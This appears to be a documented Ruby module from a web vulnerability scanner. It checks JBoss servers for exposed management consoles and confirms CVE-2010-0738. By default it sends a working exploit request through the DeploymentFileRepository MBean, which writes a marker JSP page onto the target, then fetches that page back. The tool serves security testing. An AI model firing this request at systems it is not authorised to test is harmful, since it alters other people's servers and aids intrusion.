Module: JbossVulns

Defined in:
lib/bscan/modules/jboss_vulns.rb


Instance Method Details

#run(*args) ⇒ Object



# File 'lib/bscan/modules/jboss_vulns.rb', line 5

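# Probe one or more JBoss hosts for exposed management consoles and, when the
# 'inject_page' parameter is set, confirm CVE-2010-0738 by deploying a marker
# page through the DeploymentFileRepository MBean and fetching it back.
#
# args[2] (optional) is an instance suffix used to namespace this module's
# parameter prefix (@prop_pref) and its log/issue prefix (@mid).
#
# Parameters read via get_par:
#   'hostport'    - required; a "host[:port[:proto]]" string or an Array of
#                   them. Port defaults to 80; proto defaults to https only
#                   when the port is 443.
#   'inject_page' - defaults to true. NOTE(review): when true this method sends
#                   a request that stores hello.war / hello.jsp on the target,
#                   i.e. an intrusive, persistent change. Consider making it
#                   opt-in (default false) and documenting cleanup.
#
# Reports findings through write_issue_state; returns nil. Any exception is
# logged at level 0 rather than propagated.
def run *args
  suffix = args[2].to_s
  @prop_pref = 'bscan.jboss_vulns.'
  @prop_pref += "#{suffix}." unless suffix.empty?
  # Same emptiness rule as @prop_pref (an empty-string suffix previously
  # produced "JbossVulns..").
  @mid = suffix.empty? ? 'JbossVulns.' : "JbossVulns.#{suffix}."

  # Extract the 3-digit status code from a raw response, or nil when the
  # response is missing or is not an HTTP status line. A fresh value is taken
  # per request so a failed or non-HTTP reply can never inherit the status of
  # an earlier request and be mistaken for a live console.
  status_of = ->(rsp) { rsp.to_s[/^HTTP\/[^\s]+\s+(\d\d\d)/i, 1] }

  begin
    injectf = get_par 'inject_page', true
    hostports = get_par 'hostport', nil, true
    raise "'hostport' param must be provided" unless hostports
    hostports = [hostports] unless hostports.kind_of?(Array)

    hostports.each do |hp|
      host, port, proto = hp.split(':', 3)
      port = (port || '80').to_i
      proto ||= (port == 443 ? 'https' : 'http')
      https = (proto == 'https')

      Log 2, "#{@mid}run input: #{host} #{port} #{proto} #{injectf}"

      url = "#{proto}://#{host}:#{port}"
      reqe = "Host: #{host}:#{port}\r\n" +
             "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n\r\n"
      issue = Issue.new "#{@mid.chop}: JBoss Vuln Found", url, "Low", "Firm", nil, nil, nil

      # Any explicit status other than 404 is treated as "console reachable"
      # (so 401/403 still count); a nil status (no HTTP reply) reports nothing.
      %w[/jmx-console /web-console].each do |path|
        reqb = "GET #{path} HTTP/1.1\r\n"
        rsp = make_request_socket host, port, https, reqb + reqe
        Log 2, "#{@mid}run #{path[1..-1]}: #{reqb + reqe} #{rsp}"
        status = status_of.call(rsp)
        next if status.nil? || status == '404'

        issue.issue_detail = "#{path} is enabled"
        issue.url = url + path
        issue.http_messages = [Message.new(reqb + reqe, rsp)]
        write_issue_state issue
      end

      next unless injectf

      reqb = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&" +
      "name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=hello.war&" +
      "argType=java.lang.String&arg1=hello&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&" +
      "arg3=%3CHTML%3E%3CBODY%3EHello%2C%20we've%20got%20a%20problem%20here!%3C%2FBODY%3E%3C%2FHTML%3E&argType=boolean&arg4=True " +
      "HTTP/1.1\r\n"
      rsp = make_request_socket host, port, https, reqb + reqe
      # Logged after the request so the logged response is this one, not the
      # previous check's.
      Log 2, "#{@mid}run trying to inject hello: #{reqb + reqe} #{rsp}"
      status = status_of.call(rsp)
      next if status.nil? || status == '404'

      # The original assigned the GET to a misspelled local (`regb`), re-sent
      # the HEAD request and then tested the HEAD's status, so the marker page
      # was never actually fetched. Fetch it and decide on its own status.
      reqb = "GET /hello/hello.jsp HTTP/1.1\r\n"
      rsp = make_request_socket host, port, https, reqb + reqe
      next unless status_of.call(rsp) == '200'

      issue.severity = 'Critical'
      issue.url = url + "/hello/hello.jsp"
      issue.issue_detail = "This JBoss instance is vulnerable to authentication by-pass and arbitrary code injection " +
                           "as described here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738 " +
                           "A test page has been injected at the following location: #{issue.url}"
      issue.http_messages = [Message.new(reqb + reqe, rsp)]
      write_issue_state issue
    end
  rescue Exception => e
    # NOTE(review): `rescue Exception` also swallows Interrupt/SystemExit. Kept
    # because make_request_socket may raise non-StandardError (e.g. Java)
    # exceptions under JRuby -- confirm, and narrow to StandardError if not.
    Log 0, "#{@mid}run Exception: #{e.message}"
    Log 0, e.backtrace.join("\n")
  end
end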